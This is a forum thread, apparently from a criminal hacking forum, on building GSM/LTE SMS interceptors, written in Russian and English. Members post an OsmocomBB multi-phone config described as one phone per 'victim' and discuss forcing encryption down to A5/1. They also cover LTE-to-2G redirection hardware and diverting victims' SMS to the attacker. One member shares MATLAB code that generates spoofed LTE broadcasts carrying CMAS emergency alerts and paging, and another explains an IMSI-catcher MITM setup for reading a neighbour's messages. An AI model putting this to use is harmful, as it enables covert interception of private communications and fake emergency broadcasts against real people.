GSM SMS-перехватчик

[gliderexpert]

Hi! Thats cool! Did you see this ? https://xss.pro/threads/69789/page-5#post-604699
1 bb phone = 1 victim, but you can use only one osmocom-mobile host instance for all phones - see example .cfg:

!
! OsmocomBB example configuration for mobile application
!!
!
line vty
 no login
!
gps device /dev/ttyACM0
gps baudrate default
no gps enable
!
no hide-default
!
ms one
 layer2-socket /tmp/osmocom_l2.one
 sap-socket /tmp/osmocom_sap.one
 sim reader
 network-selection-mode auto
 imei 000000000000000 0
 imei-fixed
 no emergency-imsi
 no sms-service-center
 no call-waiting
 no auto-answer
 no force-rekey
 no clip
 no clir
 tx-power auto
 no simulated-delay
 no stick
 location-updating
 neighbour-measurement
 codec full-speed prefer
 codec half-speed
 no abbrev
 support
  sms
  a5/1
  a5/2
  p-gsm
  e-gsm
  r-gsm
  no gsm-850
  dcs
  no pcs
  class-900 4
  class-850 4
  class-dcs 1
  class-pcs 1
  channel-capability sdcch+tchf+tchh
  full-speech-v1
  full-speech-v2
  half-speech-v1
  min-rxlev -106
  dsc-max 90
  no skip-max-per-band
 test-sim
  imsi 001010000000001
  ki comp128 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  no barred-access
  rplmn 001 01
 no shutdown
!
ms two
 layer2-socket /tmp/osmocom_l2.two
 sap-socket /tmp/osmocom_sap.two
 sim reader
 network-selection-mode auto
 imei 000000000000000 0
 imei-fixed
 no emergency-imsi
 no sms-service-center
 no call-waiting
 no auto-answer
 no force-rekey
 no clip
 no clir
 tx-power auto
 no simulated-delay
 no stick
 location-updating
 neighbour-measurement
 codec full-speed prefer
 codec half-speed
 no abbrev
 support
  sms
  a5/1
  a5/2
  p-gsm
  e-gsm
  r-gsm
  no gsm-850
  dcs
  no pcs
  class-900 4
  class-850 4
  class-dcs 1
  class-pcs 1
  channel-capability sdcch+tchf+tchh
  full-speech-v1
  full-speech-v2
  half-speech-v1
  min-rxlev -106
  dsc-max 90
  no skip-max-per-band
 test-sim
  imsi 001010000000002
  ki comp128 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  no barred-access
  rplmn 001 01
 no shutdown

 

[Aladd9n]

Извините за нескромный вопрос, но в данном топике вы утверждали, что все 99% абонентов используют A5/3, тогда я не понимаю почему на этом форуме селлили перехватчик за $1000.000 как это понимать, зачем он нужен если уж все юзают A5/3?

 

[gliderexpert]

Извините за нескромный вопрос, но в данном топике вы утверждали, что все 99% абонентов используют A5/3, тогда я не понимаю почему на этом форуме селлили перехватчик за $1000.000 как это понимать, зачем он нужен если уж все юзают A5/3?

Активная система перехвата принудительно перекидывает абонента в режим шифрования 5/1.
Пассивной системой сейчас перехватывать трафик не получится, т.к. доступных дешифраторов для 5/3 на рынке пока нет, а сотовые сети в большинстве случаев по умолчанию используют 5/3.

 

[clark1337]

GilderExpert, for managing multiple targets, we require various BB devices to be flashed with distinct sockets while maintaining centralized control through a single mobile application.

Moreover, I’ve come across some remarkable visuals showcasing your work on the redirection topic—truly outstanding. That said, it appears the older redirection method has become ineffective. Certain phones revert to 4G and then back to LTE due to the causes employed, specifically Attach Reject or Service Reject. I'm curious—have you encountered this issue as well?

Hi! Thats cool! Did you see this ? https://xss.pro/threads/69789/page-5#post-604699
1 bb phone = 1 victim, but you can use only one osmocom-mobile host instance for all phones - see example .cfg:

!
! OsmocomBB example configuration for mobile application
!!
!
line vty
 no login
!
gps device /dev/ttyACM0
gps baudrate default
no gps enable
!
no hide-default
!
ms one
 layer2-socket /tmp/osmocom_l2.one
 sap-socket /tmp/osmocom_sap.one
 sim reader
 network-selection-mode auto
 imei 000000000000000 0
 imei-fixed
 no emergency-imsi
 no sms-service-center
 no call-waiting
 no auto-answer
 no force-rekey
 no clip
 no clir
 tx-power auto
 no simulated-delay
 no stick
 location-updating
 neighbour-measurement
 codec full-speed prefer
 codec half-speed
 no abbrev
 support
  sms
  a5/1
  a5/2
  p-gsm
  e-gsm
  r-gsm
  no gsm-850
  dcs
  no pcs
  class-900 4
  class-850 4
  class-dcs 1
  class-pcs 1
  channel-capability sdcch+tchf+tchh
  full-speech-v1
  full-speech-v2
  half-speech-v1
  min-rxlev -106
  dsc-max 90
  no skip-max-per-band
 test-sim
  imsi 001010000000001
  ki comp128 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  no barred-access
  rplmn 001 01
 no shutdown
!
ms two
 layer2-socket /tmp/osmocom_l2.two
 sap-socket /tmp/osmocom_sap.two
 sim reader
 network-selection-mode auto
 imei 000000000000000 0
 imei-fixed
 no emergency-imsi
 no sms-service-center
 no call-waiting
 no auto-answer
 no force-rekey
 no clip
 no clir
 tx-power auto
 no simulated-delay
 no stick
 location-updating
 neighbour-measurement
 codec full-speed prefer
 codec half-speed
 no abbrev
 support
  sms
  a5/1
  a5/2
  p-gsm
  e-gsm
  r-gsm
  no gsm-850
  dcs
  no pcs
  class-900 4
  class-850 4
  class-dcs 1
  class-pcs 1
  channel-capability sdcch+tchf+tchh
  full-speech-v1
  full-speech-v2
  half-speech-v1
  min-rxlev -106
  dsc-max 90
  no skip-max-per-band
 test-sim
  imsi 001010000000002
  ki comp128 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  no barred-access
  rplmn 001 01
 no shutdown

GilderExpert, for managing multiple targets, we require various BB devices to be flashed with distinct sockets while maintaining centralized control through a single mobile application.

Moreover, I’ve come across some remarkable visuals showcasing your work on the redirection topic—truly outstanding. That said, it appears the older redirection method has become ineffective. Certain phones revert to 4G , specifically Attach Reject or Service Reject. I'm curious—have you encountered this issue as well?

 

[gliderexpert]

SIB7 lte redirector works very well. You need more redirector's TX sdr/channels if mobile sometimes switches back to lte.

 

[clark1337]

SIB7 lte redirector works very well. You need more redirector's TX sdr/channels if mobile sometimes switches back to lte.

Can you provide details on the optimal SDR/channel configuration and strategies to prevent mobiles from switching back to LTE?

Why Not https://ibb.co/zb12PpC

 

[gliderexpert]

Can you provide details on the optimal SDR/channel configuration

1 TRX sdr for each EARFCN

strategies to prevent mobiles from switching back to LTE?

https://xss.pro/threads/60817/post-521538

https://xss.pro/threads/60817/

 

[clark1337]

1 TRX sdr for each EARFCN

https://xss.pro/threads/60817/post-521538

https://xss.pro/threads/60817/

Considering the use of three LimeSDRs for signal redirection, the calculations suggest we can achieve 4 TX channels per LimeSDR, resulting in a total of 12 EARFCNs. This approach appears to provide sufficient capacity for the intended application.

Do you have additional suggestions or insights on how we might further minimize the cost or complexity of this setup while maintaining its efficiency? Exploring alternative hardware configurations or software optimizations could also be beneficial.

• RF Transceiver: Lime Microsystems LMS7002M FPRF
• FPGA: Altera Cyclone IV EP4CE40F23 – also compatible with EP4CE30F23
• Memory: 256 MBytes DDR2 SDRAM
• USB 3.0 controller: Cypress USB 3.0 CYUSB3014-BZXC
• Oscillator: Rakon RPT7050A @30.72MHz
• Continuous frequency range: 100 kHz – 3.8 GHz
• Bandwidth: 61.44 MHz
• RF connection: 12x U.FL connectors (6 RX, 4 TX, 2 CLK I/O)
• Power Output (CW): up to 10 dBm
• Multiplexing: 2×2 MIMO
• Power: Micro USB connector or optional external power supply
• Status indicators: programmable LEDs
• Dimensions: 100 mm x 60 mm

 

[gliderexpert]

Considering the use of three LimeSDRs for signal redirection, the calculations suggest we can achieve 4 TX channels per LimeSDR, resulting in a total of 12 EARFCNs. This approach appears to provide sufficient capacity for the intended application.

No... 3 lime sdr = 3 tx channels = 3 arfcn.
lms7002 has only one DDS frequency generator for all channels.

Do you have additional suggestions or insights on how we might further minimize the cost or complexity of this setup while maintaining its efficiency? Exploring alternative hardware configurations or software optimizations could also be beneficial.

You can use HackRF.

 

[clark1337]

No... 3 lime sdr = 3 tx channels = 3 arfcn.
lms7002 has only one DDS frequency generator for all channels.


You can use HackRF.

Great work on making HackRF function with srsRAN!

 

[gliderexpert]

Not possible, hack rf = only tdd mode
You should write tdd code youself using for example mathlab lte toolbox lib's .

 

[clark1337]

Not possible, hack rf = only tdd mode
You should write tdd code youself using for example mathlab lte toolbox lib's .y

Ok Thanks i will work on it . there more gide lines ?

Hi GliderExpert,

I believe that with some adjustments to the configuration in srsRAN, we could potentially achieve reselection using just one SDR, without the need for multi-band attack.

Looking forward to hearing your thoughts on this!

 

[clark1337]

Hi! Thats cool! Did you see this ? https://xss.pro/threads/69789/page-5#post-604699
1 bb phone = 1 victim, but you can use only one osmocom-mobile host instance for all phones - see example .cfg:

!
! OsmocomBB example configuration for mobile application
!!
!
line vty
 no login
!
gps device /dev/ttyACM0
gps baudrate default
no gps enable
!
no hide-default
!
ms one
 layer2-socket /tmp/osmocom_l2.one
 sap-socket /tmp/osmocom_sap.one
 sim reader
 network-selection-mode auto
 imei 000000000000000 0
 imei-fixed
 no emergency-imsi
 no sms-service-center
 no call-waiting
 no auto-answer
 no force-rekey
 no clip
 no clir
 tx-power auto
 no simulated-delay
 no stick
 location-updating
 neighbour-measurement
 codec full-speed prefer
 codec half-speed
 no abbrev
 support
  sms
  a5/1
  a5/2
  p-gsm
  e-gsm
  r-gsm
  no gsm-850
  dcs
  no pcs
  class-900 4
  class-850 4
  class-dcs 1
  class-pcs 1
  channel-capability sdcch+tchf+tchh
  full-speech-v1
  full-speech-v2
  half-speech-v1
  min-rxlev -106
  dsc-max 90
  no skip-max-per-band
 test-sim
  imsi 001010000000001
  ki comp128 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  no barred-access
  rplmn 001 01
 no shutdown
!
ms two
 layer2-socket /tmp/osmocom_l2.two
 sap-socket /tmp/osmocom_sap.two
 sim reader
 network-selection-mode auto
 imei 000000000000000 0
 imei-fixed
 no emergency-imsi
 no sms-service-center
 no call-waiting
 no auto-answer
 no force-rekey
 no clip
 no clir
 tx-power auto
 no simulated-delay
 no stick
 location-updating
 neighbour-measurement
 codec full-speed prefer
 codec half-speed
 no abbrev
 support
  sms
  a5/1
  a5/2
  p-gsm
  e-gsm
  r-gsm
  no gsm-850
  dcs
  no pcs
  class-900 4
  class-850 4
  class-dcs 1
  class-pcs 1
  channel-capability sdcch+tchf+tchh
  full-speech-v1
  full-speech-v2
  half-speech-v1
  min-rxlev -106
  dsc-max 90
  no skip-max-per-band
 test-sim
  imsi 001010000000002
  ki comp128 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  no barred-access
  rplmn 001 01
 no shutdown

Hey gliderExpert , yes tested with 8 phones too work there some good result about block sms to be recieved by the origine phone and only recieved by the attacker also ( MSEVIL) can't do this job with kc / seq only . what you think about that ?

 

[tenac1ous]

Not possible, hack rf = only tdd mode
You should write tdd code youself using for example mathlab lte toolbox lib's .

Что можешь сказать по поводу этого подхода?

function generateCmasSignal
    enb = initializeEnbConfig();

    enb.NDLRB = 25; % Example: 5 MHz bandwidth. CHANGE THIS AS NEEDED!
    if ~ismember(enb.NDLRB, [6 15 25 50 75 100])
        error('Invalid NDLRB value. Must be one of: 6, 15, 25, 50, 75, 100.');
    end

    enb.PDSCH.TxScheme = 'Port0';
    enb.PDSCH.Modulation = {'QPSK'};
    enb.PDSCH.RVSeq = [0 1 2 3];

    txWaveform = [];
    for nSubframe = 0:enb.TotSubframes-1
        enb.NSubframe = mod(nSubframe, 10);
        if enb.NSubframe == 0
            enb.NFrame = enb.NFrame + 1;
        end

        txGrid = lteDLResourceGrid(enb);

        if any(enb.NSubframe == [0, 5])
            txGrid(ltePSSIndices(enb)) = ltePSS(enb);
            txGrid(lteSSSIndices(enb)) = lteSSS(enb);
        end

        if mod(enb.NFrame, 4) == 0 && enb.NSubframe == 0
            mibBits = lteMIB(enb);
            txGrid(ltePBCHIndices(enb)) = ltePBCH(enb, mibBits);
        end

        if mod(enb.NFrame, 8) == 0 && enb.NSubframe == 5
            try
                sib1Encoded = loadBinaryMessage('sib1.uper');
            catch ME
                error('Error loading SIB1: %s', ME.message);
            end
            enb.PDSCH.PRBSet = (0:enb.NDLRB-1)'; % Use ALL PRBs for SIB1
            [sib1Symbols, ~] = lteDLSCH(enb, enb.PDSCH, sib1Encoded);
            pdschIndices = ltePDSCHIndices(enb, enb.PDSCH, enb.PDSCH.PRBSet);
            txGrid(pdschIndices) = sib1Symbols;
        end

        if mod(enb.NFrame, 32) == 0 && enb.NSubframe == 5
            try
                sib12Encoded = loadBinaryMessage('sib12_with_cmas.uper');
            catch ME
                error('Error loading SIB12 with CMAS: %s', ME.message);
            end
            enb.PDSCH.PRBSet = (0:enb.NDLRB-1)'; % Use ALL PRBs for SIB12
            [sib12Symbols, ~] = lteDLSCH(enb, enb.PDSCH, sib12Encoded);
            pdschIndices = ltePDSCHIndices(enb, enb.PDSCH, enb.PDSCH.PRBSet);
            txGrid(pdschIndices) = sib12Symbols;
        end

        % *** Broadcast Paging (Using 'paging.uper' file) ***
        % Example: Broadcast Paging in subframe 4 of frames where mod(enb.NFrame, 16) == 0
        if mod(enb.NFrame, 16) == 0 && enb.NSubframe == 4
            try
                broadcastPagingEncoded = loadBinaryMessage('paging.uper'); % Load broadcast paging message from 'paging.uper'
            catch ME
                error('Error loading Paging: %s', ME.message);
            end
            enb.PDSCH.PRBSet = (0:enb.NDLRB-1)'; % Use ALL PRBs for Broadcast Paging
            [broadcastPagingSymbols, ~] = lteDLSCH(enb, enb.PDSCH, broadcastPagingEncoded);
            pdschIndices = ltePDSCHIndices(enb, enb.PDSCH, enb.PDSCH.PRBSet);
            txGrid(pdschIndices) = broadcastPagingSymbols;
        end

        subframeWaveform = lteOFDMModulate(enb, txGrid);
        txWaveform = [txWaveform; subframeWaveform];

        disp(['Processing frame: ' num2str(enb.NFrame) ', subframe: ' num2str(enb.NSubframe)]);
    end

    scaledTxWaveform = int16(txWaveform * 32767);
    fileID = fopen('lte_iq_stream.bin', 'w');
    fwrite(fileID, [real(scaledTxWaveform) imag(scaledTxWaveform)]', 'int16');
    fclose(fileID);

    disp('I/Q stream has been exported to lte_iq_stream.bin in int16 format.');
end

function enb = initializeEnbConfig()
    enb = lteRMCDL('R.4');
    enb.TDDConfig = 1;
    enb.SSC = 7;
    enb.TotSubframes = 40;
    enb.NFrame = 0;
    enb.NSubframe = 0;
    enb.NCellID = 17;
    enb.CyclicPrefix = 'Normal';
    enb.DuplexMode = 'TDD';
    enb.PHICHDuration = 'Normal';
    enb.CFI = 3;
end

function binaryMessage = loadBinaryMessage(filename)
    fileID = fopen(filename, 'r');
    if fileID == -1
        error(['Could not open file: ' filename]);
    end
    cleanup = onCleanup(@() fclose(fileID));
    binaryMessage = fread(fileID, '*uint8');
end

Я редактирую ASN1 схемы сообщений через ASN.1 Studio и вывожу их в бинарные UPER файлы, которые подтягиваются уже в коде.

 

[NEMO]

вопрос от новичка, представим я сижу где то в ЕС знаю номер телефона соседа, и включаю такую штуку, могу ли получать его смс ?

 

[tenac1ous]

вопрос от новичка, представим я сижу где то в ЕС знаю номер телефона соседа, и включаю такую штуку, могу ли получать его смс ?

Нужен телефон на который можно записать IMSI который будет схвачен IMSI кетчером (Motorola), потом нужна соотвественно сама базовая станция, для жерты она должна быть станцией, а для оператора передавать данные как будто это телефон. Если просто запустить БС и поймать чей то телефон, то для него связь с внешним миром полностью обрывается (нет возможностей интеракции з другими устройсвами за БС). Поэтому нужна аттака MiTM.

Либо напиши супер пупер крутой full chain 0click RCE exploit, который обойдет защитные меры сим карты и телефона, и отсылай полезную нагрузку в виде бинарных сообщений)

 

[swap3r]

Либо напиши супер пупер крутой full chain 0click RCE exploit, который обойдет защитные меры сим карты и телефона, и отсылай полезную нагрузку в виде бинарных сообщений)

там только за такой эксплоит цена от 1.5М ЮСД и что-то о таких мало последнее время слышно))

немного ковырялся в матлабовском коде, если можно, то пару вопросов
1. верно ли я понимаю, что эта штука позволяет селективно выбирать на сеть какого оператора мы делаем рассылку емердженси сообщений (указанием мцц и мнц)?
2. если ответ на 1 = "да", то что тогда получается с роумерами, которые находятся в сети с заданными нами мцц и мнц в зоне действия рассылочника наших сиб сообщений (хакрфа, блейда, или юсрп)?

 

[tenac1ous]

там только за такой эксплоит цена от 1.5М ЮСД и что-то о таких мало последнее время слышно))

немного ковырялся в матлабовском коде, если можно, то пару вопросов
1. верно ли я понимаю, что эта штука позволяет селективно выбирать на сеть какого оператора мы делаем рассылку емердженси сообщений (указанием мцц и мнц)?
2. если ответ на 1 = "да", то что тогда получается с роумерами, которые находятся в сети с заданными нами мцц и мнц в зоне действия рассылочника наших сиб сообщений (хакрфа, блейда, или юсрп)?

Ты настраиваешь все для соотвествия з настоящей вышкой. Для этого не нужны дорогие sdr, есть куча приложений на андроид которые показывают эту информацию. В более продвинутых схемах, используется несколько sdr для захвата информации для подходящей вышки и правильной конфигурации уже самой БС которая шлет нужные пакеты.

 

[jeki]

Странно, если это юса, то диапазоны должны быть другие немного. Сейчас это уже в любом случае, для юсы это не будет работать - там 2 дж сети отключили.
Но, скажем так, числа достижимы вполне для текущих реалий в других странах, для указанных Тобой диапазон

Отключение оператором 2G не означает что телефоны тут же его перестали поддерживать, поэтому на работу комплексов с 2G ( а тут разговор именно о них) это никак не повлияет

 

[swap3r]

Отключение оператором 2G не означает что телефоны тут же его перестали поддерживать, поэтому на работу комплексов с 2G ( а тут разговор именно о них) это никак не повлияет

возможно, что я что-то путаю, но: предположим опсос А отключил у себя поддержку 2g сетей, абонент опсоса А имеет телефон с поддержкой 2g, комплекс заставляет его насильно даунгрейднутся до 2g, и что дальше? 2g сети то нету...